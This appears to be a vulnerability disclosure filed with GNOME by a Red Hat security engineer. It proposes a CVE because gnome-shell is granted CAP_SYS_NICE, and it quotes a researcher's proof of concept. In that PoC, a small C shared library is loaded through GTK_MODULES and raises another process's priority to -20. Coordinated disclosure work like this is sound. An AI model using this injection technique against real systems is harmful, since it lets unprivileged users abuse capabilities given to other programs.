New Security Issue: CAP_SYS_NICE use
Original reporter: Marco Benatto
Area: Application
Message
Hello,
my name is Marco Benatto and I'm a Sr. Product Security Engineer at Red Hat. A few time ago we received a security report from an independent researcher about the usage of CAP_SYS_NICE on gnome-shell and how one can abuse it to higher the nice value from an unprivileged task. While we understand the final decision to give gnome-shell CAP_SYS_NICE capability is up to distros/downstream we'd like to assign a CVE (for notification purposes), explicit mentioning only ditros that assign this capability to the referred component, may be affected by this issue.
Please let me know your thoughts on this as I don't want to eventually step on upstream's toes.
The original report:
"Hello, I happened to notice a minor issue while working a tool I'm writing. I'm not sure if gnome or the fedora package is to blame, but it seems gnome-shell is now given cap_sys_nice:
$ rpm -qf /bin/gnome-shell gnome-shell-3.38.4-1.fc33.x86_64 $ getcap /bin/gnome-shell /bin/gnome-shell cap_sys_nice=ep
This seems incorrect. Here is a demo, I'm just a regular user, and this pid has a priority of 0:
$ ps -heo nice -q 495980 0
I don't have permission to raise that:
$ renice -n -20 495980 renice: failed to set priority for 495980 (process ID): Permission denied
But it doesn't matter, I can just make gnome do it:
$ cat prio.c #include #include #include
void attribute((constructor)) init() { setpriority(PRIO_PROCESS, 495980, -20); _exit(0); } $ gcc -fPIC -shared -o prio.so prio.c $ env GTK_MODULES=/proc/self/cwd/prio.so /bin/gnome-shell --list-modes
And if I look at the priority now...
$ ps -heo nice -q 495980 -20"
Thanks,